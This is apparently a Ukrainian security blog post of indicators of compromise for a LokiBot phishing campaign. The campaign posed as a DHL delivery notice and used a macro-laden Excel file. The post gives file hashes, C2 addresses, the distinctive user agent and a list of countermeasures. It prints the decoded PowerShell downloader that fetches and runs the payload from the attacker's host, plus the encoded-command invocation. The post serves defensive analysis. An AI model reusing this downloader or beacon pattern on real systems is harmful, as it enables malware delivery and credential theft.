IOC_lokibot_140318

Доброго дня, панове.

Вчора було зафіксовано чергову розсилку #lokibot під виглядом сповіщення служби доставки DHL.

На відміну від ISO (01/03) та RTF із 11882 (13/03), цього разу – документ Excel із макросом.

Рівень загрози – середній.

Для тих, хто врахував наші попередні рекомендації – низький.

Трохи аналітики:

  • Доставка через XLS документи, макрос передає кодовані інструкції на PowerShell
  • Адреса завантаження та ім’я файлу чітко задані інструкціями
  • Завантаження основної частини засобами процесу PowerShell
  • Хостинг основної частини та С2 один і той же хост
  • Основна частина записується у AppData а не у Temp
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Зупинити атаку можна застосувавши один із шести(!) способів (див. розділ Контрзаходи)
  • Спроб закріплення не проводив
  • Даний тип ШПЗ застосовується для збору інформації та крадіжки облікових даних
  • Будуть повторні спроби доставки із перебором інших типів приманок та обгорток
  • Користувачі McAfee (VSE/ENS) зверніть увагу – payload визначається по DAT.

Схема атаки:

email > (Attach) .xlam > EXCEL > VBA > CMD > PowerShell GET h11p:\ocha-gidi{.} xyz/x/Order.exe> $env:Appdata+'\NtbCQbOq.exe'

Маркери IOC:

Документ-приманка:
SHA-256        70ee8c354807af2f2e0b33a5954bbd3beb3f654aa03f03d89bc43a5aa3e32de4
File name   senders info&parcel details.xlam
File size      63.8 KB

Основна частина:

SHA-256        77807f48686ae3c4920a4eda55e979d62cd5419ea900049119f005cf9b475c76
File name   Order.exe >> $env:Appdata+'\NtbCQbOq.exe'
File size      1.47 MB

Мережеві IOC:

Завантаження основної частини через PowerShell

111.90.147.140   ocha-gidi{.} xyz   GET /x/Order.exe HTTP/1.1

З’єднання із C2

111.90.147.140   xyz-storez{.} xyz   POST /secure/Panel/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)

Тут ключовий момент – User Agent, який використовує #lokibot:

POST /secure/Panel/five/fre.php HTTP/1.0

User-Agent: Mozilla/4.08 (Charon; Inferno)

Host: xyz-storez{.} xyz

Accept: */*

Content-Type: application/octet-stream

Минулі розсилки:

185.148.146.121   Excellog{.} org     POST /Chisom/five/fre.php HTTP/1.0          Mozilla/4.08 (Charon; Inferno)
82.118.242.100   kelsandsons{.} info  POST /kelvin/Panel/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)

Активність по процесам:

При відкритті документу активується макрос

"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e

"C:\Windows\System32\cmd.exe" & /c pOWErshELL -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAcgBjAG8AeQBlAFUASwBXAFIAeQB2…

pOWErshELL  -EncODeDCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAcgBjAG8AeQBlAFUASwBXAFIAeQB…

"C:\Users\operator\AppData\Roaming\NtbCQbOq.exe"

Декодуємо base64:

(нетипова функція, імпровізують, зверніть увагу на каталог – не %temp%, а AppData\Roaming)

function rcoyeUKWRyvkuPVibYUewthwpUs

( $zSUdVuzXtPMuooDPKODOyYtb , $sHktyvsIJcLDwUZqurbSPefp )

{(New-Object System.Net.WebClient).DownloadFile( $zSUdVuzXtPMuooDPKODOyYtb , $sHktyvsIJcLDwUZqurbSPefp );

(New-Object -com Shell.Application).ShellExecute( $sHktyvsIJcLDwUZqurbSPefp ); }

try{

kill -processname EXCEL;

$ucFaRAYiGNxYCuMin=$env:Appdata+’\NtbCQbOq.exe’;

rcoyeUKWRyvkuPVibYUewthwpUs ‘h11p:\ocha-gidi{.} xyz/x/Order.exe’ $ucFaRAYiGNxYCuMin;

}catch{}

Контрзаходи:

  • Блокування мережевих запитів із локальної мережі з User Agent Mozilla/4.08 (Charon; Inferno)
  • Заборона запуску макросів (параметри пакету MS Office або реєстр ОС або GPO)
  • Блок запуску дочірніх процесів для додатків MS Office (Excel > CMD > PowerShell) – GPO або правило Access Protection
  • Блок запуску PowerShell з кодованими командами – GPO або сигнатури блоку Exploit Prevention ENS
  • Блокування доступу до мережі Інтернет для процесів PowerShell (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%
  • Посилена фільтрація передачі запускних файлів по каналам Web та Email (payload не кодований)
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії
  • з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: